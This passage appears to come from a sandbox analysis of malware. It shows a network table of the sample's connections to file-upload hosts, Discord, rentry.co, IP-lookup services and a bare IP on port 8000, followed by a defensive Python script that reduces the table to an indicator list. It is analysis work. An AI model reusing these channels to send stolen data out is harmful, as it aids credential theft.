| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.146.67.172.in-addr.arpa | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 51.178.66.33:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 252.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.179.17.96.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| SE | 78.69.106.17:8000 | | tcp |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | 2.96.114.188.in-addr.arpa | udp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 8.8.8.8:53 | store1.gofile.io | udp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| US | 8.8.8.8:53 | 227.123.112.45.in-addr.arpa | udp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| SE | 78.69.106.17:8000 | | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkip.amazonaws.com | udp |
| SE | 78.69.106.17:8000 | | tcp |
| IE | 34.252.239.71:80 | checkip.amazonaws.com | tcp |
| US | 172.67.146.76:443 | textpubshiers.top | tcp |
| US | 8.8.8.8:53 | 71.239.252.34.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| SE | 78.69.106.17:8000 | | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | edge.msiserver.lan | udp |
| SE | 78.69.106.17:8000 | | tcp |
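Most rows in the table above are resolver traffic (forward and reverse lookups to 8.8.8.8, mDNS) and repeated connections to the same few hosts, so the indicator list an analyst actually needs is much shorter than the table. The script below is an added example, not part of the sandbox output; it parses rows in the table's markdown format, tolerating the two malformed row shapes a scraped table of this kind can carry (a blank Domain cell shifted into the Proto column, or dropped altogether), discards the resolver rows, and counts connections per (name, IP, port). Treating bing.* and msiserver.lan traffic as browser and sandbox background noise is an assumption of this example, as is the list of IP-lookup services; the sample rows are a constructed subset copied from the table.

```python
"""Collapse the sandbox Network table above into a short endpoint list.

Added example for this page; not part of the sandbox's output. Parses the
markdown rows, repairs the two malformed row shapes, drops resolver traffic
(UDP 53/5353), and counts connections per (name, ip, port, proto).
"""
from collections import Counter

PROTOS = {"tcp", "udp"}
# Assumption: background traffic from Edge and the analysis VM, not the sample.
BENIGN_SUFFIXES = ("bing.net", "bing.com", "msiserver.lan")
# Assumption: the services behind the "Looks up external IP address" signature.
IP_LOOKUP_HOSTS = {"ip-api.com", "api.ipify.org", "checkip.amazonaws.com", "geolocation-db.com"}

# Rows copied from the Network table above (constructed subset). The header
# row and both malformed shapes are included on purpose.
SAMPLE_ROWS = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 51.178.66.33:443 | gofile.io | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| SE | 78.69.106.17:8000 | tcp | |
| SE | 78.69.106.17:8000 | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 8.8.8.8:53 | edge.msiserver.lan | udp |
""".strip().splitlines()


def parse_row(row):
    """One markdown row -> dict, or None for the header or an unparsable row."""
    cells = [c.strip() for c in row.strip().strip("|").split("|")]
    # Malformed shape 1: blank Domain cell dropped, leaving three cells.
    if len(cells) == 3 and cells[2].lower() in PROTOS:
        cells.insert(2, "")
    # Malformed shape 2: protocol sits in the Domain column, Proto is blank.
    if len(cells) == 4 and cells[3] == "" and cells[2].lower() in PROTOS:
        cells[2], cells[3] = "", cells[2]
    if len(cells) != 4:
        return None
    country, dest, domain, proto = cells
    ip, _, port = dest.rpartition(":")
    if not port.isdigit() or proto.lower() not in PROTOS:
        return None  # header row or garbage
    return {"country": country, "ip": ip, "port": int(port),
            "domain": domain, "proto": proto.lower()}


def is_noise(rec):
    """Resolver traffic and known background hosts carry no indicator value."""
    if rec["proto"] == "udp" and rec["port"] in (53, 5353):
        return True
    return rec["domain"].endswith(BENIGN_SUFFIXES)


def summarize(rows):
    """Counter of (name, ip, port, proto) -> connection count.
    name falls back to the IP when no domain was recorded for the row."""
    counts = Counter()
    for row in rows:
        rec = parse_row(row)
        if rec is None or is_noise(rec):
            continue
        counts[(rec["domain"] or rec["ip"], rec["ip"], rec["port"], rec["proto"])] += 1
    return counts


def unnamed_endpoints(summary):
    """Destinations reached by bare IP with no DNS name observed. Every other
    endpoint in this report is a public service, so these get the first look."""
    return sorted((ip, port, proto) for name, ip, port, proto in summary if name == ip)


def ip_lookup_services(summary):
    """Hosts used to learn the victim's public IP."""
    return {name for name, _, _, _ in summary if name in IP_LOOKUP_HOSTS}


if __name__ == "__main__":
    summary = summarize(SAMPLE_ROWS)
    for (name, ip, port, proto), n in summary.most_common():
        print(f"{n:3d}  {proto} {ip}:{port}  {name}")
    print("unnamed endpoints:", unnamed_endpoints(summary))
    print("ip lookup services:", ip_lookup_services(summary))
```

On the full table the same reduction leaves roughly a dozen endpoints: the gofile.io store hosts used by the curl uploads, discord.com, rentry.co, raw.githubusercontent.com, textpubshiers.top, the IP-lookup services, and the one bare-IP destination 78.69.106.17:8000, which is the only connection here with no DNS name and a non-web port.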
Files